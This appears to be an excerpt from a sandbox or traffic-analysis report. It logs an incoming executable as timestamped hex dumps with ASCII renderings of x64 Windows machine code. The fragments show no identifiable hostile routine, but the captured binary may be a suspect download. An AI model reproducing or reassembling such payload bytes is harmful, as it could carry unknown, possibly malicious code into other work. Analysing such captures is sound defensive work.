2023-11-18 09:02:42 UTC	8746	IN	Data Raw: f7 ff ff eb 12 48 b9 00 00 00 00 00 00 08 00 48 0b c1 48 89 44 24 60 f2 0f 10 44 24 60 48 83 c4 58 c3 cc cc 41 b8 20 00 00 00 48 8d 15 4b 75 15 00 e9 4a ff ff ff cc cc 48 89 5c 24 10 48 89 74 24 18 55 57 41 56 48 8d ac 24 10 fb ff ff 48 81 ec f0 05 00 00 48 8b 05 14 6b 18 00 48 33 c4 48 89 85 e0 04 00 00 41 8b f8 8b f2 8b d9 83 f9 ff 74 05 e8 0d 48 ff ff 33 d2 48 8d 4c 24 70 41 b8 98 00 00 00 e8 17 54 ff ff 33 d2 48 8d 4d 10 41 b8 d0 04 00 00 e8 06 54 ff ff 48 8d 44 24 70 48 89 44 24 48 48 8d 4d 10 48 8d 45 10 48 89 44 24 50 ff 15 a9 4d 14 00 4c 8b b5 08 01 00 00 48 8d 54 24 40 49 8b ce 45 33 c0 ff 15 99 4d 14 00 48 85 c0 74 36 48 83 64 24 38 00 48 8d 4c 24 60 48 8b 54 24 40 4c 8b c8 48 89 4c 24 30 4d 8b c6 48 8d 4c 24 58 48 89 4c 24 28 48 8d 4d 10 48 89 Data Ascii: HHHD$`D$`HXA HKuJH\$Ht$UWAVH$HHkH3HAtH3HL$pAT3HMATHD$pHD$HHMHEHD$PMLHT$@IE3MHt6Hd$8HL$`HT$@LHL$0MHL$XHL$(HMH
2023-11-18 09:02:42 UTC	8747	IN	Data Raw: ee ff ff 48 8b 4d e8 48 8b 49 78 e8 b3 ee ff ff 48 8b 4d e8 48 8b 89 80 00 00 00 e8 a3 ee ff ff 48 8b 4d e8 48 8b 89 c0 03 00 00 e8 93 ee ff ff 4c 8d 4d 20 4c 8d 45 f0 48 8d 55 28 48 8d 4d 18 e8 0e fd ff ff 4c 8d 4d e0 4c 8d 45 f8 48 8d 55 e4 48 8d 4d 18 e8 e1 fd ff ff 48 83 c4 40 5d c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 48 8b da 48 8b 89 90 00 00 00 48 85 c9 74 2c e8 1f 63 00 00 48 8b 8f 90 00 00 00 48 3b 0d 4d b2 18 00 74 17 48 8d 05 ec 65 18 00 48 3b c8 74 0b 83 79 10 00 75 05 e8 f8 60 00 00 48 89 9f 90 00 00 00 48 85 db 74 08 48 8b cb e8 58 60 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 40 53 48 83 ec 20 8b 0d a0 65 18 00 83 f9 ff 74 2a e8 02 05 00 00 48 8b d8 48 85 c0 74 1d 8b 0d 88 65 18 00 33 d2 e8 45 05 00 00 48 8b cb e8 6d fe ff ff 48 Data Ascii: HMHIxHMHHMHLM LEHU(HMLMLEHUHMH@]H\$WH HHHHt,cHH;MtHeH;tyu`HHtHX`H\$0H _@SH et*HHte3EHmH
2023-11-18 09:02:42 UTC	8748	IN	Data Raw: 00 e8 44 fd ff ff 48 8b d8 48 85 c0 74 10 48 8b c8 ff 15 37 45 14 00 48 8b cf ff d3 eb 06 ff 15 02 44 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d 41 97 14 00 b9 04 00 00 00 4c 8d 05 2d 97 14 00 48 8d 15 8e 46 14 00 e8 ed fc ff ff 48 8b f8 48 85 c0 74 0f 48 8b c8 ff 15 e0 44 14 00 8b cb ff d7 eb 08 8b cb ff 15 c2 43 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d f1 96 14 00 b9 05 00 00 00 4c 8d 05 dd 96 14 00 48 8d 15 46 46 14 00 e8 95 fc ff ff 48 8b f8 48 85 c0 74 0f 48 8b c8 ff 15 88 44 14 00 8b cb ff d7 eb 08 8b cb ff 15 5a 43 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b da 4c 8d 0d 9b 96 14 00 8b f9 48 8d Data Ascii: DHHtH7EHDH\$0H _H\$WH LAL-HFHHtHDCH\$0H _H\$WH LLHFFHHtHDZCH\$0H _H\$Ht$WH HLH
2023-11-18 09:02:42 UTC	8753	IN	Data Raw: 89 7c 24 28 89 7c 24 20 e9 80 00 00 00 41 b9 03 00 00 00 45 8b f7 45 8d 61 ff 41 8d 59 08 41 8b c4 83 fd 6b 7d 12 45 8d 4c 24 02 41 8b c7 41 8d 5c 24 08 45 8d 74 24 03 89 7c 24 50 44 8b c5 89 7c 24 48 41 8b d7 89 7c 24 40 33 c9 44 89 64 24 38 89 7c 24 30 89 7c 24 28 89 44 24 20 e8 cb 00 00 00 44 8b 46 14 44 8b cb 89 7c 24 50 41 8b cf 89 7c 24 48 89 7c 24 40 44 89 64 24 38 89 7c 24 30 89 7c 24 28 44 89 74 24 20 41 8b d7 e8 9b 00 00 00 44 8b 0d 14 52 18 00 8b 0d 1e 52 18 00 44 8b 46 1c 44 3b c9 7d 24 45 3b c1 0f 8c 9e fd ff ff 44 3b c1 0f 8f 95 fd ff ff 45 3b c1 7e 25 44 3b c1 7d 20 41 8b c7 e9 85 fd ff ff 44 3b c1 7c f3 45 3b c1 7f ee 44 3b c1 7e 09 45 3b c1 0f 8c 6b fd ff ff 6b 4e 08 3c 03 4e 04 6b d1 3c 03 16 69 c2 e8 03 00 00 45 3b c1 75 11 3b 05 b0 51 Data Ascii: \|$(\|$ AEEaAYAk}EL$AA\$Et$\|$PD\|$HA\|$@3Dd$8\|$0\|$(D$ DFD\|$PA\|$H\|$@Dd$8\|$0\|$(Dt$ ADRRDFD;}$E;D;E;~%D;} AD;\|E;D;~E;kkN<Nk<iE;u;Q
2023-11-18 09:02:42 UTC	8757	IN	Data Raw: 58 c3 c5 e9 eb 15 aa 86 14 00 c5 eb 5c 15 a2 86 14 00 c5 d1 73 d2 34 c5 e9 db 15 35 86 14 00 c5 f9 28 c2 c5 d1 fa 2d 49 87 14 00 c5 fa e6 f5 e9 7b fe ff ff 75 2e c5 fb 10 0d c6 85 14 00 44 8b 05 bf 87 14 00 e8 2a 47 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c5 fb 10 0d b8 85 14 00 44 8b 05 95 87 14 00 e8 fc 46 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 90 48 3b 05 89 85 14 00 74 27 48 3b 05 70 85 14 00 74 ce 48 0b 05 97 85 14 00 c4 e1 f9 6e c8 44 8b 05 63 87 14 00 e8 c6 46 00 00 66 0f 1f 44 00 00 c5 f9 6f 74 24 20 48 83 c4 58 c3 cc 40 53 48 83 ec 30 41 8b d8 4c 8b c2 48 8b d1 48 8d 4c 24 20 e8 63 66 ff ff 48 8b d0 41 b1 01 44 8b c3 33 c9 e8 67 66 ff ff 48 83 c4 30 5b c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 Data Ascii: X\s45(-I{u.D*Got$ HXfffffffDFot$ HXH;t'H;ptHnDcFfDot$ HX@SH0ALHHL$ cfHAD3gfH0[HHXHhHp
2023-11-18 09:02:42 UTC	8761	IN	Data Raw: 14 00 48 89 55 df 48 8d 05 7e 77 14 00 48 89 55 e7 48 89 45 bf 48 89 45 c7 48 8d 05 6f 77 14 00 48 89 45 cf 48 89 45 d7 48 8d 05 70 77 14 00 48 89 45 ff 48 8d 05 75 77 14 00 48 89 45 0f 48 8d 05 7a 77 14 00 48 89 45 1f 48 8d 05 7f 77 14 00 48 89 45 2f 48 89 55 07 48 89 55 27 8d 51 ff 1b c9 4c 89 45 ef 48 c1 e2 02 f7 d1 83 e1 02 4c 89 45 f7 8b c1 48 03 c2 4c 89 45 17 4c 89 45 37 4c 8b 44 c5 bf 48 83 c8 ff 48 ff c0 41 80 3c 00 00 75 f6 4c 3b d0 0f 97 c0 45 33 c0 84 c0 41 0f 94 c0 44 03 c1 49 8b c9 4c 03 c2 49 8b d2 4e 8b 44 c5 bf e8 c4 b7 ff ff 85 c0 0f 84 0b ff ff ff 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 e8 4f c5 ff ff cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 60 4d 8b e9 49 8b e8 48 8b f2 4c 8b f9 Data Ascii: HUH~wHUHEHEHowHEHEHpwHEHuwHEHzwHEHwHE/HUHU'QLEHLEHLELE7LDHHA<uL;E3ADILINDHd$ E3E333OH\$Hl$Ht$WATAUAVAWH`MIHL
2023-11-18 09:02:42 UTC	8765	IN	Data Raw: ff ff 90 48 8b cf e8 13 00 00 00 90 8b 0b e8 0b fa ff ff 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 01 48 8b d9 48 8b 10 48 8b 82 88 00 00 00 8b 50 04 89 15 60 72 18 00 48 8b 01 48 8b 10 48 8b 82 88 00 00 00 8b 50 08 89 15 4e 72 18 00 48 8b 01 48 8b 10 48 8b 82 88 00 00 00 48 8b 88 20 02 00 00 48 89 0d 4b 72 18 00 48 8b 03 48 8b 08 48 8b 81 88 00 00 00 48 83 c0 0c 74 17 f2 0f 10 00 f2 0f 11 05 1c 72 18 00 8b 40 08 89 05 1b 72 18 00 eb 1f 33 c0 48 89 05 08 72 18 00 89 05 0a 72 18 00 e8 7d 59 ff ff c7 00 16 00 00 00 e8 be b4 ff ff 48 8b 03 bf 02 00 00 00 48 8b 08 8d 77 7e 48 8b 81 88 00 00 00 48 8d 0d 9e 24 18 00 48 83 c0 18 74 52 8b d7 0f 10 00 0f 11 01 0f 10 48 10 0f 11 49 10 0f 10 40 20 0f 11 41 20 0f 10 48 30 0f Data Ascii: HH\$0H _H\$Ht$WH HHHHP`rHHHPNrHHHH HKrHHHHtr@r3Hrr}YHHw~HH$HtRHI@ A H0
2023-11-18 09:02:42 UTC	8769	IN	Data Raw: 48 8d 0c 38 4c 8b c3 33 d2 e8 47 f7 fe ff 48 8b c6 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc 48 83 ec 28 ff 15 1a f0 13 00 48 85 c0 48 89 05 38 62 18 00 0f 95 c0 48 83 c4 28 c3 48 83 25 28 62 18 00 00 b0 01 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b f2 48 8b f9 48 3b ca 75 04 b0 01 eb 5c 48 8b d9 48 8b 2b 48 85 ed 74 0f 48 8b cd ff 15 2d f2 13 00 ff d5 84 c0 74 09 48 83 c3 10 48 3b de 75 e0 48 3b de 74 d4 48 3b df 74 2d 48 83 c3 f8 48 83 7b f8 00 74 15 48 8b 33 48 85 f6 74 0d 48 8b ce ff 15 f8 f1 13 00 33 c9 ff d6 48 83 eb 10 48 8d 43 08 48 3b c7 75 d7 32 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f1 48 3b ca 74 26 48 8d 5a Data Ascii: H8L3GHH\$0Hl$8Ht$@H _H(HH8bH(H%(bH\$Hl$Ht$WH HHH;u\HH+HtH-tHH;uH;tH;t-HH{tH3HtH3HHCH;u2H\$0Hl$8Ht$@H _H\$Ht$WH HH;t&HZ
2023-11-18 09:02:42 UTC	8770	IN	Data Raw: a7 ff ff 4c 8b e8 48 85 c0 75 08 83 c8 ff e9 22 02 00 00 48 8b 08 48 8b 15 c9 37 14 00 48 c1 e2 04 48 03 d1 eb 09 39 79 04 74 0b 48 83 c1 10 48 3b ca 75 f2 33 c9 33 c0 48 85 c9 0f 95 c0 85 c0 75 12 e8 c7 46 ff ff c7 00 16 00 00 00 e8 08 a2 ff ff eb b7 48 8d 59 08 40 32 f6 40 88 b4 24 80 00 00 00 eb 3f 83 e9 02 74 33 83 e9 04 74 13 83 e9 09 74 20 83 e9 06 74 12 83 f9 01 74 04 33 db eb 22 48 8d 1d 6d 5f 18 00 eb 19 48 8d 1d 5c 5f 18 00 eb 10 48 8d 1d 63 5f 18 00 eb 07 48 8d 1d 42 5f 18 00 48 83 a4 24 98 00 00 00 00 40 84 f6 74 0b b9 03 00 00 00 e8 ea e5 ff ff 90 40 84 f6 74 17 48 8b 15 bd 0a 18 00 8b ca 83 e1 3f 48 33 13 48 d3 ca 4c 8b fa eb 03 4c 8b 3b 49 83 ff 01 0f 94 c0 88 84 24 88 00 00 00 84 c0 0f 85 bf 00 00 00 4d 85 ff 75 18 40 84 f6 74 09 41 8d 4f Data Ascii: LHu"HH7HH9ytHH;u33HuFHY@2@$?t3tt tt3"Hm_H\_Hc_HB_H$@t@tH?H3HLL;I$Mu@tAO
2023-11-18 09:02:42 UTC	8774	IN	Data Raw: 52 48 83 cf ff 48 ff c7 80 3c 3e 00 75 f7 48 83 38 00 74 3f 48 8b 0b 48 83 c8 ff 48 ff c0 80 3c 01 00 75 f7 48 3b c7 76 15 80 3c 39 3d 75 0f 4c 8b c7 48 8b d6 e8 47 24 00 00 85 c0 74 0a 48 83 c3 08 48 83 3b 00 eb ca 48 8b 03 48 ff c0 48 03 c7 eb 02 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b c4 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 70 20 41 57 48 83 ec 30 4d 8b f9 49 8b f0 48 8b fa 4c 8b f1 b9 0b 00 00 00 e8 8d d5 ff ff 90 33 db 8b c3 4d 85 f6 0f 95 c0 85 c0 75 13 e8 e1 35 ff ff bb 16 00 00 00 89 18 e8 21 91 ff ff eb 6e 49 89 1e 48 85 ff 74 0a 48 85 f6 75 0a 48 85 ff 75 0c 48 85 f6 75 07 b8 01 00 00 00 eb 02 8b c3 85 c0 74 c9 48 85 ff 74 02 88 1f 49 8b cf e8 f4 fe ff ff 4c 8b c0 48 85 c0 74 33 48 83 c8 ff 48 ff c0 41 38 1c 00 75 f7 48 Data Ascii: RHH<>uH8t?HHH<uH;v<9=uLHG$tHH;HHH3H\$0Ht$8H _HHXHpHxLp AWH0MIHL3Mu5!nIHtHuHuHutHtILHt3HHA8uH
2023-11-18 09:02:42 UTC	8778	IN	Data Raw: 68 cb fe ff 44 8b 9d 20 03 00 00 41 83 fb 01 0f 87 a2 00 00 00 8b 85 24 03 00 00 85 c0 75 0f 45 33 ff 44 89 bd 50 01 00 00 e9 09 03 00 00 83 f8 01 0f 84 00 03 00 00 45 85 ff 0f 84 f7 02 00 00 45 33 c0 4c 8b d0 45 33 c9 42 8b 8c 8d 54 01 00 00 41 8b c0 49 0f af ca 48 03 c8 4c 8b c1 42 89 8c 8d 54 01 00 00 49 c1 e8 20 41 ff c1 45 3b cf 75 d7 45 85 c0 74 34 83 bd 50 01 00 00 73 73 1a 8b 85 50 01 00 00 44 89 84 85 54 01 00 00 44 8b bd 50 01 00 00 41 ff c7 eb 88 45 33 ff 44 89 bd 50 01 00 00 32 c0 e9 8e 02 00 00 44 8b bd 50 01 00 00 e9 80 02 00 00 41 83 ff 01 0f 87 ad 00 00 00 8b 9d 54 01 00 00 4d 8b c3 49 c1 e0 02 45 8b fb 44 89 9d 50 01 00 00 4d 85 c0 74 40 b8 cc 01 00 00 48 8d 8d 54 01 00 00 4c 3b c0 77 0e 48 8d 95 24 03 00 00 e8 72 ca fe ff eb 1a 4c 8b c0 Data Ascii: hD A$uE3DPEE3LE3BTAIHLBTI AE;uEt4PssPDTDPAE3DP2DPATMIEDPMt@HTL;wH$rL
2023-11-18 09:02:42 UTC	8782	IN	Data Raw: 8b f1 33 db 8b c3 81 f9 00 20 00 00 0f 92 c0 85 c0 75 15 e8 67 15 ff ff bb 09 00 00 00 89 18 e8 a7 70 ff ff 8b c3 eb 64 b9 07 00 00 00 e8 e5 b4 ff ff 90 48 8b fb 48 89 5c 24 20 8b 05 96 2b 18 00 3b f0 7c 3b 4c 8d 3d 8b 27 18 00 49 39 1c ff 74 02 eb 22 e8 aa fe ff ff 49 89 04 ff 48 85 c0 75 05 8d 58 0c eb 19 8b 05 6a 2b 18 00 83 c0 40 89 05 61 2b 18 00 48 ff c7 48 89 7c 24 20 eb c1 b9 07 00 00 00 e8 e1 b4 ff ff eb 98 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 48 83 c4 30 41 5f c3 cc 48 63 c9 48 8d 15 2a 27 18 00 48 8b c1 83 e1 3f 48 c1 f8 06 48 c1 e1 06 48 03 0c c2 48 ff 25 99 b9 13 00 cc 48 63 c9 48 8d 15 06 27 18 00 48 8b c1 83 e1 3f 48 c1 f8 06 48 c1 e1 06 48 03 0c c2 48 ff 25 bd b9 13 00 cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 56 48 83 ec Data Ascii: 3 ugpdHH\$ +;\|;L='I9t"IHuXj+@a+HH\|$ H\$@Ht$HH\|$PH0A_HcH*'H?HHHH%HcH'H?HHHH%H\$Ht$H\|$AVH
2023-11-18 09:02:42 UTC	8786	IN	Data Raw: 02 00 00 00 48 8d 55 e0 88 45 e0 44 88 6d e1 eb 45 e8 48 6d ff ff 0f b6 0f ba 00 80 00 00 66 85 14 48 74 29 49 3b fc 0f 83 ef 00 00 00 41 b8 02 00 00 00 48 8d 4d c0 48 8b d7 e8 b7 8b ff ff 83 f8 ff 0f 84 f4 00 00 00 48 ff c7 eb 1b 41 b8 01 00 00 00 48 8b d7 48 8d 4d c0 e8 97 8b ff ff 83 f8 ff 0f 84 d4 00 00 00 48 83 64 24 38 00 48 8d 45 e8 48 83 64 24 30 00 4c 8d 45 c0 8b 4d cc 41 b9 01 00 00 00 c7 44 24 28 05 00 00 00 33 d2 48 89 44 24 20 48 ff c7 ff 15 1d ab 13 00 44 8b f0 85 c0 0f 84 94 00 00 00 48 8b 4d d0 4c 8d 4d c8 48 83 64 24 20 00 48 8d 55 e8 44 8b c0 ff 15 2f a9 13 00 33 d2 85 c0 74 6b 8b 4b 08 2b 4d d8 03 cf 89 4b 04 44 39 75 c8 72 62 41 80 fd 0a 75 34 48 8b 4d d0 8d 42 0d 48 89 54 24 20 44 8d 42 01 48 8d 55 c4 66 89 45 c4 4c 8d 4d c8 ff 15 f0 Data Ascii: HUEDmEHmfHt)I;AHMHHAHHMHd$8HEHd$0LEMAD$(3HD$ HDHMLMHd$ HUD/3tkK+MKD9urbAu4HMBHT$ DBHUfELM
2023-11-18 09:02:42 UTC	8790	IN	Data Raw: 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 60 48 8b f2 49 8b d9 48 8b d1 41 8b f8 48 8d 4c 24 40 e8 a3 b9 fe ff 8b 84 24 a8 00 00 00 48 8d 4c 24 48 89 44 24 38 4c 8b cb 8b 84 24 a0 00 00 00 44 8b c7 89 44 24 30 48 8b d6 48 8b 84 24 98 00 00 00 48 89 44 24 28 8b 84 24 90 00 00 00 89 44 24 20 e8 06 fc ff ff 80 7c 24 58 00 74 0c 48 8b 4c 24 40 83 a1 a8 03 00 00 fd 48 8b 5c 24 70 48 8b 74 24 78 48 83 c4 60 5f c3 cc cc cc cc cc cc cc 66 89 4c 24 08 48 83 ec 38 48 8b 0d e0 c1 17 00 48 83 f9 fe 75 0c e8 59 02 00 00 48 8b 0d ce c1 17 00 48 83 f9 ff 75 07 b8 ff ff 00 00 eb 25 48 83 64 24 20 00 4c 8d 4c 24 48 41 b8 01 00 00 00 48 8d 54 24 40 ff 15 7d 9a 13 00 85 c0 74 d9 0f b7 44 24 40 48 83 c4 38 c3 cc cc cc 48 89 5c 24 08 4c Data Ascii: A^A]A\_^[]H\$Ht$WH`HIHAHL$@$HL$HD$8L$DD$0HH$HD$($D$ \|$XtHL$@H\$pHt$xH`_fL$H8HHuYHHu%Hd$ LL$HAHT$@}tD$@H8H\$L
2023-11-18 09:02:42 UTC	8794	IN	Data Raw: 48 8d 54 24 60 48 8b 4c 24 30 e8 37 02 00 00 85 c0 74 13 f2 0f 10 4c 24 60 48 8b 8c 24 90 00 00 00 e8 d0 f7 0f 00 48 8b 4c 24 70 48 33 cc e8 03 7b fe ff 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 74 24 20 57 48 83 ec 30 48 8b f9 48 8d 15 9c ca 15 00 49 8b 08 49 8b f0 0f b7 41 08 83 e0 3f 0f b6 14 10 83 ea 01 0f 84 72 01 00 00 83 ea 01 0f 84 fa 00 00 00 48 89 5c 24 48 83 ea 01 74 50 83 fa 01 75 3b e8 95 fc 0f 00 48 8b d8 48 85 c0 74 2e 48 8b 0e e8 45 fc 0f 00 83 f8 08 75 21 48 8b 0f b8 00 24 00 00 48 8b 13 66 85 41 08 0f 85 9b 00 00 00 48 89 11 b8 04 00 00 00 66 89 41 08 48 8b 5c 24 48 48 8b 74 24 58 48 83 c4 30 5f c3 48 85 c9 74 eb 0f b7 51 08 41 b8 02 02 00 00 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 59 10 eb 0f Data Ascii: HT$`HL$07tL$`H$HL$pH3{HHt$ WH0HHIIA?rH\$HtPu;HHt.HEu!H$HfAHfAH\$HHt$XH0_HtQAfA#fA;uyuHY
2023-11-18 09:02:42 UTC	8798	IN	Data Raw: 44 38 30 74 5f 48 8b 5c 24 60 e9 f2 f9 ff ff 48 85 f6 74 07 4c 8b b6 f8 00 00 00 49 8b d6 48 8d 0d 1c 13 15 00 e8 77 fa 12 00 48 8b ce 48 8b d8 e8 8c ee 0f 00 48 8b 44 24 50 41 b1 01 4d 8b c7 4c 89 7c 24 20 48 8b d3 48 8b 08 c7 40 24 01 00 00 00 e8 7a 7b 10 00 48 8b cb e8 b2 29 13 00 e9 eb 01 00 00 4c 8b 64 24 50 48 8d 55 f0 48 8d 4c 24 70 e8 2a 04 00 00 49 8b 1c 24 48 8b 4b 28 48 85 c9 0f 84 37 01 00 00 8b 81 88 00 00 00 e9 31 01 00 00 48 8b cb e8 26 51 07 00 48 8b 54 24 48 48 8d 0d 7a 12 15 00 4c 8b c0 e8 f2 f9 12 00 48 8b 4c 24 40 48 8b f8 e8 05 ee 0f 00 48 8b 44 24 50 41 bd 01 00 00 00 48 8b 18 44 89 68 24 48 85 ff 75 32 b8 00 24 00 00 66 85 43 08 74 15 48 8b cb e8 1b 88 10 00 48 8b cf e8 23 29 13 00 e9 5c 01 00 00 48 8b cf 66 44 89 6b 08 e8 11 29 13 Data Ascii: D80t_H\$`HtLIHwHHHD$PAML\|$ HH@$z{H)Ld$PHUHL$p*I$HK(H71H&QHT$HHzLHL$@HHD$PAHDh$Hu2$fCtHH#)\HfDk)
2023-11-18 09:02:42 UTC	8803	IN	Data Raw: 6e 44 33 75 77 03 c7 44 33 75 97 03 c8 44 03 c9 d1 c6 41 8b c1 41 d1 c6 c1 c0 05 8b ca 41 33 c8 05 a1 eb d9 6e 41 33 cb 41 c1 c8 02 03 c6 45 8b fd 03 c8 44 33 ff 44 33 7d a3 44 03 d1 44 33 7d 87 8b ca 41 33 c9 41 d1 c7 41 33 c8 41 c1 c9 02 41 8b c2 c1 c0 05 05 a1 eb d9 6e 41 03 c6 03 c8 44 03 d9 41 8b ca 41 33 c9 41 8b c3 c1 c0 05 41 33 c8 05 a1 eb d9 6e 41 03 c7 03 c8 03 d1 8b 45 7f 33 c6 41 c1 ca 02 33 04 24 41 8b ca 33 45 77 41 33 c9 d1 c0 41 33 cb 89 45 83 8b c2 44 8b 6d 83 41 81 c5 a1 eb d9 6e c1 c0 05 41 03 c5 41 c1 cb 02 03 c8 44 8b 6d 8b 45 33 ee 44 03 c1 44 33 6c 24 04 41 8b c0 44 33 6d a3 8b ca 41 d1 c5 41 33 ca c1 c0 05 41 33 cb 44 89 6d 87 41 81 c5 a1 eb d9 6e 41 03 c5 c1 ca 02 03 c8 41 8b c7 44 03 c9 41 33 c4 33 45 9b 8b ca 33 04 24 41 33 c8 Data Ascii: nD3uwD3uDAAA3nA3AED3D3}DD3}A3AA3AAnADAA3AA3nAE3A3$A3EwA3A3EDmAnAADmE3DD3l$AD3mAA3A3DmAnAADA33E3$A3
2023-11-18 09:02:42 UTC	8807	IN	Data Raw: 00 00 85 ed 0f 85 a7 00 00 00 48 8b d7 41 b8 01 00 00 00 0f 1f 40 00 48 8b 43 18 41 80 3c 00 01 75 7a 48 8b 43 20 42 8b 0c 80 83 f9 7f 77 0b 88 4c 1a 30 b8 01 00 00 00 eb 50 81 f9 ff 0f 00 00 77 15 8b c1 c1 e8 06 0c c0 88 44 13 30 48 ff c2 b8 02 00 00 00 eb 29 81 f9 ff ff 00 00 77 3d 8b c1 c1 e8 0c 0c d0 88 44 13 30 8b c1 c1 e8 06 24 3f 0c 80 88 44 13 31 48 83 c2 02 b8 03 00 00 00 80 e1 3f 80 c9 80 88 4c 13 30 48 ff c2 49 ff c0 03 f8 48 83 fa 0a 0f 8c 7b ff ff ff 85 ff 7e 0e 8d 4f ff 48 63 c1 80 7c 18 30 00 0f 44 f9 89 7b 3c 48 8b 43 10 e9 67 fe ff ff 48 8b cb e8 15 00 00 00 48 8d 05 26 f1 14 00 e9 53 fe ff ff cc cc cc cc cc cc cc cc cc 48 85 c9 74 27 53 48 83 ec 20 48 8b d9 48 8b 49 18 e8 1a 08 13 00 48 8b 4b 20 e8 11 08 13 00 48 8b cb e8 09 08 13 00 48 Data Ascii: HA@HCA<uzHC BwL0PwD0H)w=D0$?D1H?L0HIH{~OHc\|0D{<HCgHH&SHt'SH HHIHK HH
2023-11-18 09:02:42 UTC	8811	IN	Data Raw: e8 ad 03 00 00 85 c0 0f 85 67 02 00 00 85 ed 0f 84 5f 02 00 00 41 8d 53 01 48 8b ce e8 21 06 00 00 e9 4e 02 00 00 8b 4c 24 38 e8 c3 03 00 00 8b cd 44 8b c0 e8 b9 03 00 00 41 3b c0 0f 84 32 02 00 00 45 8b 07 45 8d 4b 01 41 8b d4 45 85 c0 74 17 90 8b c2 0f b7 0c 43 41 3b c9 0f 84 13 02 00 00 ff c2 41 3b d0 72 ea 41 8d 40 01 66 46 89 0c 43 41 89 07 e9 fb 01 00 00 44 8b 06 41 8b d4 45 85 c0 74 21 4c 8b 4e 08 66 66 0f 1f 84 00 00 00 00 00 8b c2 41 0f b7 0c 41 41 3b cb 74 16 ff c2 41 3b d0 72 ed 48 8b 46 08 66 46 89 1c 40 41 8d 40 01 89 06 45 8b 07 45 8d 4b 01 41 8b d4 45 85 c0 74 26 4d 8b 57 08 66 66 66 0f 1f 84 00 00 00 00 00 8b c2 41 0f b7 0c 42 41 3b c9 0f 84 92 01 00 00 ff c2 41 3b d0 72 e9 49 8b 47 08 66 46 89 0c 40 41 8d 40 01 41 89 07 e9 76 01 00 00 49 Data Ascii: g_ASH!NL$8DA;2EEKAEtCA;A;rA@fFCADAEt!LNffAAA;tA;rHFfF@A@EEKAEt&MWfffABA;A;rIGfF@A@AvI
2023-11-18 09:02:42 UTC	8815	IN	Data Raw: 60 e8 a7 a8 0f 00 48 8b f0 48 85 c0 0f 84 44 01 00 00 49 8b 4f 08 e8 32 aa 0f 00 48 63 e8 48 8d 4d 01 e8 26 e9 12 00 48 89 43 28 48 85 c0 74 b2 4c 8d 45 01 48 8b d6 48 8b c8 e8 5e 37 fe ff 80 3e 24 75 27 4c 8b 43 28 48 8d 44 24 60 49 ff c0 48 89 44 24 20 45 33 c9 48 8d 4b 30 33 d2 e8 da 2f 00 00 48 8b 74 24 60 48 8b f8 48 85 f6 74 5a 48 8b 0b 48 8b 49 10 e8 81 e7 12 00 48 8b d6 48 8d 0d 07 cc 14 00 e8 02 b8 12 00 48 8b 0b 48 89 41 10 48 8b cb e8 03 09 00 00 48 8b 03 bf 07 00 00 00 ba 01 00 00 00 4c 39 60 10 0f 45 fa 8b c7 48 8b 7c 24 70 48 8b 74 24 68 4c 8b 7c 24 30 48 83 c4 38 41 5e 41 5c 5d 5b c3 48 85 ff 75 08 33 c0 eb dd 48 8b 7b 38 48 8b cf 48 2b 4b 38 48 c1 f9 04 89 4b 10 89 4b 0c 0f b6 07 88 43 18 3c 06 72 5e 44 89 67 08 44 8b 43 10 41 8d 48 01 03 Data Ascii: `HHDIO2HcHM&HC(HtLEHH^7>$u'LC(HD$`IHD$ E3HK03/Ht$`HHtZHHIHHHHAHHL9`EH\|$pHt$hL\|$0H8A^A\][Hu3H{8HH+K8HKKC<r^DgDCAH
2023-11-18 09:02:42 UTC	8819	IN	Data Raw: 75 10 48 8b 43 18 48 8b 4b 08 c6 04 01 5d 48 ff 43 18 0f b6 43 21 84 c0 74 15 3c 01 0f 85 22 01 00 00 48 8b cf e8 ce 8d 0f 00 e9 15 01 00 00 4c 63 43 18 48 83 c9 ff 48 8b 53 08 41 b1 01 85 f6 74 44 80 7b 20 00 48 8d 05 2b d7 12 00 48 0f 45 c1 48 8b 0f 48 89 44 24 20 e8 da 28 10 00 85 c0 74 1b 48 8b cf 83 f8 12 75 0e e8 19 8e 0f 00 c6 43 20 01 e9 cc 00 00 00 e8 7b 8d 0f 00 c6 43 20 01 e9 be 00 00 00 48 89 4c 24 20 48 8b 0f e8 a5 28 10 00 85 c0 74 1b 48 8b cf 83 f8 12 75 0e e8 e4 8d 0f 00 48 ff 4b 18 e9 97 00 00 00 e8 46 8d 0f 00 48 ff 4b 18 e9 89 00 00 00 48 8b 1f 48 8b 43 28 48 85 c0 74 08 8b b0 88 00 00 00 eb 09 be 00 ca 9a 3b 0f 1f 40 00 b8 00 24 00 00 66 85 43 08 75 06 83 7b 20 00 